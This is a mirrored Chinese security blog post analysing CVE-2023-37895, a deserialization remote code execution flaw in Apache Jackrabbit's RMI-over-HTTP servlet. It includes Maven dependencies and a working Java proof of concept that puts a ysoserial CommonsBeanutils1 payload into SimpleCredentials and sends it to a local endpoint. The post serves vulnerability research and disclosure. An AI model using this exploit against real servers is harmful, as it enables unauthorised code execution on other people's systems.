3

CVE-2023-37895: Apache Jackrabbit RMI RCE

 9 months ago
source link: https://y4er.com/posts/cve-2023-37895-apache-jackrabbit-rmi-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

CVE-2023-37895: Apache Jackrabbit RMI RCE

 2023-07-28  2023-07-28  约 408 字  预计阅读 1 分钟 
本文最后更新于 2023-07-28,文中内容可能已过时。

https://lists.apache.org/thread/j03b3qdhborc2jrhdc4d765d3jkh8bfw

image.png

漏洞点已经指出来了,rmi over http。

org.apache.jackrabbit.servlet.remote.RemoteBindingServlet

image.png

关键是怎么利用呢?根据文档 https://jackrabbit.apache.org/archive/wiki/JCR/RemoteAccess_115513494.html 用JcrUtils拿可以拿到Repository,给定http url拿到的是URLRemoteRepository

image.png

Repository接口有几个方法,其中login函数的参数为javax.jcr.Credentials

image.png

该接口有两个实现类

其中SimpleCredentials有一个<string,object>类型的hashmap

image.png

所以可以将cb序列化payload放入hashmap发送。

pom引入依赖

<dependencies>
    <dependency>
        <groupId>javax.jcr</groupId>
        <artifactId>jcr</artifactId>
        <version>2.0</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/org.apache.jackrabbit/jackrabbit-jcr-rmi -->
    <dependency>
        <groupId>org.apache.jackrabbit</groupId>
        <artifactId>jackrabbit-jcr-rmi</artifactId>
        <version>2.21.10</version>
    </dependency>
    <dependency>
        <groupId>org.apache.jackrabbit</groupId>
        <artifactId>jackrabbit-jcr2dav</artifactId>
        <version>2.0-beta6</version>
    </dependency>
    <dependency>
        <groupId>org.slf4j</groupId>
        <artifactId>slf4j-simple</artifactId>
        <version>1.5.8</version>
    </dependency>
</dependencies>

构造反序列化payload并发送

package org.example;

import org.apache.jackrabbit.commons.JcrUtils;
import ysoserial.payloads.CommonsBeanutils1;

import javax.jcr.Repository;
import javax.jcr.SimpleCredentials;


public class Main {
    public static void main(String[] args) throws Exception {
        SimpleCredentials simpleCredentials = new SimpleCredentials("1", "1".toCharArray());
        simpleCredentials.setAttribute("a", new CommonsBeanutils1().getObject("calc"));

        Repository repository = JcrUtils.getRepository("http://localhost:8080/rmi");
        repository.login(simpleCredentials);
    }
}

rce留念

image.png

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK